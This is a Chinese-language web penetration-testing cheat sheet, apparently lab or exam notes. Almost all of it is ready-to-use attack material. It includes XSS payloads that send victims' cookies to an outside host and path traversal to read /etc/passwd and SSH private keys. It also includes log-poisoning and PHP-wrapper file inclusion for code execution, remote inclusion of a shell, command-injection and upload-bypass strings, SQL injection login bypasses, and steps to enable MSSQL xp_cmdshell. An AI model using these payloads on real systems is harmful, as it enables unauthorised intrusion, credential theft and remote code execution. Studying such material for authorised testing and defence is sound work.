Web 基础

目录枚举

# 目录枚举
gobuster dir -w dict.txt -t 10 --url http://1.1.1.1
dirsearch -u http://1.1.1.1 -f -e php,txt,pdf,html
feroxbuster -u http://1.1.1.1 --no-state --filter-status 404

Wordpress

## 基础模块枚举
wpscan --url http://172.16.33.108/wordpress --api-token $wp_token
## 枚举爆破全部模块，耗时较长
wpscan --url http://10.168.1.63/wordpress/ --api-token $wp_token -e ap --plugins-detection aggressive
## 枚举用户名
wpscan --url http://10.168.1.63/wordpress/ --api-token $wp_token -e u
## 爆破用户密码
wpscan --url http://10.10.110.100:65000/wordpress --api-token $wp_token -e u james -P /usr/share/seclists/Passwords/Common-Credentials/xato-net-10-million-passwords-100.txt

模糊测试

# 字域名枚举
ffuf -u "http://colorlib.info" -H "host: FUZZ.colorlib.info" -w /usr/share/seclists/Discovery/DNS/subdomains-spanish.txt

# 参数枚举
## 单个参数
ffuf -u "http://172.16.33.18/console/file.php?COMM=VUL" -w common.txt:COMM -w ../../Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt:VUL -c -fs 0
## 多个参数
ffuf -u "http://172.16.33.18/console/file.php?A=B" -w /usr/share/seclists/Discovery/Web-Content/common.txt:A -w /usr/share/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt:B -c -fs 0

API 访问

# 常见访问方式
curl -i http://192.168.50.16:5002/users/v1/login
curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json' http://1.1.1.1/users/v1/login
curl -d '{"password":"lab","username":"offsec","email":"pwn@offsec.com","admin":"True"}' -H 'Content-Type: application/json' http://1.1.1.1/users/v1/register
curl -d '{"password":"lab","username":"offsec"}' -H 'Content-Type: application/json' http://1.1.1.1/users/v1/login
curl --proxy 127.0.0.1:8080 -d '{"password":"pwned","username":"admin"}' -H 'Content-Type: application/json' http://1.1.1.1/users/v1/login

# 爆破节点，可能存在 v1，v2版本
{GOBUSTER}/v1
{GOBUSTER}/v2

XSS（跨站脚本攻击）

# payload
## html
<script>alert(123)</script>
<iframe src="http://10.1.8.26/?a="+document.cookie height="0" width="0"></iframe>
<script>new Image().src="http://10.1.8.26/cool.jpg?"+document.cookie;</script>
## 事件
<body onload=alert("XSS")>
## 属性
<img src="X" onerror="javascript:alert(1)">

# 绕过
## 大小写
<sCript>alert(1)</Script>
## 双写
<scr<script>ipt>alert(1)</scr</script>ipt>

路径遍历（目录穿越）

page=../../../../../../etc/passwd
page=../../../../../../home/offsec/.ssh/id_rsa
page=../../../../../../home/offsec/.ssh/id_ed25519
page=../../../../../../../../windows/system32/drivers/etc/hosts

文件包含

# ------------本地文件包含------------
# 通过 web 日志 getshell
## 将反弹 shell 写入 user-agent
http://1.1.1.1/index.php?page=../../../../../../var/log/apache2/access.log&cmd=ps

# 通过 ssh 日志 getshell
## 创建 config 文件
touch ~/.ssh/config
Host target
  HostName 1.1.1.1
  User <?php system($_GET['cmd'])?>
## 连接 ssh 将一句话木马写入日志中
ssh target
## 本地文件包含执行一句话木马
http://1.1.1.1/file.php?file=/var/log/auth.log&cmd=id

# 封装器
http://10.11.0.22/file.php?file=data:text/plain,<?php echo shell_exec("ls ");?>

http://10.11.0.22/file.php?file=data:/text/plain;base64,<?php $var=shell_exec($_GET['cmd']); echo $var ;?>

http://10.11.0.22/file.php?file=data:/text/
plain;base64,PD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7IGVjaG8gJHZhcjA/Pg==&cmd=id

http://10.11.0.22/file.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php

http://10.11.0.22/file.php?page=php://filter/read=convert.base64-encode/resource=../../../../../../../../etc/passwd

http://10.11.0.22/file.php?page=php://filter/read=plain/resource=/etc/passwd

http://10.11.0.22/file.php?page=php://filter/write=convert.base64-decode/resource=test.php&txt=MTIzCg==

POST：http://127.0.0.1/cmd.php?cmd=php://input
data：<?php phpinfo()?>

# ------------远程文件包含------------
# PHP配置中 allow_url_fopen 和 allow_url_include 必须开启（On）
http://10.1.0.2/menu.php?file=http://10.1.0.4/shell.php

# ------------常见敏感文件------------
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline

命令注入

127.0.0.1 && id
127.0.0.1 ; env
127.0.0.1 & id
127.0.0.1|id
# 通配符匹配
;cat flag.txt -> flag.* -> flag.?xt
# 绕过空格
ls$IFS$9test.txt
cat$IFS$9test.t'x't

文件上传

# 扩展名绕过
.php5
.php7
.phtml
.php.shtml
.php%00.jpg

# Content-Type
Content-Type:image/png

# .htaccess 绕过
echo "AddType application/x-httpd-php .png" > .htaccess

# Windows 系统绕过
1.php[space]
1.php............
1.php::$DATA

# 解析绕过
1.php.zxyw
1.jpg/.php

SQL 注入

# 测试可用注入
'
"
[
]
(
)
%

# 万能密码
admin'--
admin' or 1=1;--
1' or '1'='1
admin' or 1=1 limit 1;--
admin' or 1=1 limit 0,1--

# 盲注
1' or SUBSTR(BIN(ASCII(Substr(Database(),1,1))),1,1)=1 limit 0,1#

# 测定列数
1' order by 2#

# 联合查询
1' union select 1,2#
1' union select user(),database()#

# 所有库 所有表
' union select table_name,table_schema from information_schema.tables#

# 查表名
' union select 1,table_name from information_schema.tables where table_schema='dvwa'#

# 查列名
' union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'#

# MSSQL
a'; WAITFOR DELAY '0:0:5'--
a';IF ((SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell')=1) WAITFOR DELAY '0:0:5'--

# 启动xp_cmdshell
a';EXECUTE sp_configure 'show advanced options', 1;--
a';RECONFIGURE;--
a';EXECUTE sp_configure 'xp_cmdshell', 1;--
a';RECONFIGURE;--

a';EXEC master..xp_cmdshell @cmd--